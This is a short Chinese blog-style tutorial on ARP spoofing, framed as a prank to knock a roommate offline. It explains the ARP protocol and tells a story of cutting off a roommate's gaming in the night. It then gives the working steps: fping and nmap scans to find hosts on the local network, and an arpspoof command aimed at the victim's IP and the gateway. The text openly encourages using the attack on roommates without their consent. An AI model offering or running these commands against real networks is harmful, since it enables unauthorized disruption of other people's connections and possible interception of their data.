arp断网攻击可以是同局域网内主机无法上网!(可恶搞室友哦,嘻嘻!)
实现原理
arp的中文释义是地址解析协议,全英文 address resolution protocol,是一个将局域网IP地址映射到网卡物理地址(MAC)的工作协议。或许你应该听说过或者遇到过arp欺骗攻击,正是因为钻了此工作协议的一些漏洞引起的。因为arp欺骗攻击通常发生在局域网内,所以多见于恶作剧。遭受arp欺骗攻击的可能会造成不能连入外网,严重的可能造成个人数据的泄露。
模拟环境:我和小明是室友,而且我们连的是同一台路由器,我通过内网扫描可以扫描到他的电脑ip。一天晚上小明打游戏很晚,整个寝室全是他的游戏声音,严重干扰我睡觉,我就偷偷将我的电脑开了起来,进行了arp攻击,一分钟后小明无奈的关掉了电脑,直骂某运营商是*鸡。嘿嘿,终于可以好好睡觉了。。。zzz
实验环境
VMware环境下的win7和kali(linux)主机一台
win7和kali处于同一网段,即可以通信。
win7地址:192.168.127.130
kali地址:192.168.127.128
开始实验
0x1.扫描内网主机
0x1.1.可利用fping命令中icmp协议来查看内网主机
输入->>fping -asg 所处的ip网段
0X1.2.也可以用nmap扫描工具
输入->>nmap -sV 所处的ip网段
0x2.接下来只需要一句命令就可以让小明断网了,一直在加载哦,哈哈。
输入->>arpspoof -i eth0 -t 小明的ip地址 网关
总结:该实验就是利用了arp协议欺骗要攻击的主机,使其认为我是网关,从而进行断网。
实验难度:★☆☆☆☆